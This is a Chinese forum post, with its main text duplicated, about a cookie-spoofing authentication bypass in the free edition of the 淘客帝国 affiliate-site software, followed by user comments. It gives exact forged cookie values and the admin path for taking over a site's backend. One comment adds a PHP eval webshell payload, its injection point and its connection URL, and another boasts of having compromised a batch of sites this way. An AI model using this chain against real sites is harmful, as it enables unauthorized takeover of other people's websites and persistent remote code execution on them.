淘客帝国最新免费版后台cookie欺骗
主题:淘客帝国最新免费版后台cookie欺骗
作者:孤心
偶然发现的淘客帝国免费版的后台可以cookie欺骗
工具: 老兵的cookie'欺骗工具
关键字: 分类- 商城- 品牌- 女人- 男人- 美容- 鞋包- 数码- 居家- 食品
首先打开工具把cookie改为 COOKIEadminuser=admin; DedeUserID=1; PHPSESSID=11111 ,然后再工具的地址栏那里输入网站的后台(默认后台/admin)等页面全部出来后再在后台目录后加上manage.php 跳转就可以进入后台了,进入后台后怎么样拿shell就简单了,这里就不说了..
漏洞已跟官网客服报了
作者:孤心
偶然发现的淘客帝国免费版的后台可以cookie欺骗
工具: 老兵的cookie'欺骗工具
关键字: 分类- 商城- 品牌- 女人- 男人- 美容- 鞋包- 数码- 居家- 食品
首先打开工具把cookie改为 COOKIEadminuser=admin; DedeUserID=1; PHPSESSID=11111 ,然后再工具的地址栏那里输入网站的后台(默认后台/admin)等页面全部出来后再在后台目录后加上manage.php 跳转就可以进入后台了,进入后台后怎么样拿shell就简单了,这里就不说了..
漏洞已跟官网客服报了
评论24次
好像挺低级的一个漏洞
session不作验证....
这个怎么玩的? 代码神马意思?
楼上说的的确啊
有奇葩程序员才有做安全的人存在。
学xi了 试试去
学xi拉,膜拜高手
少年给你个玩具玩 你就懂了
我也是这么认为的
路过,打酱油,可以么。
还是用session吧! !
之前X 淘客站的时候用这洞日过一批。。。
不知道是我的问题还是啥... 测试了好几个都没成功
试试去。
又是一个条件问题
学雷锋 一定没好下场 无节操的人太多了 妹子还会给你送 好人卡 你卖萌 人家就黑你
这个程序员 真是奇葩啊
getshell 简单 xi统配置 {${@eval($_POST['anlfi'])}} 一句话连接地址/data/configdata.php 顺便补一下代码 ===================|The End}
确实好用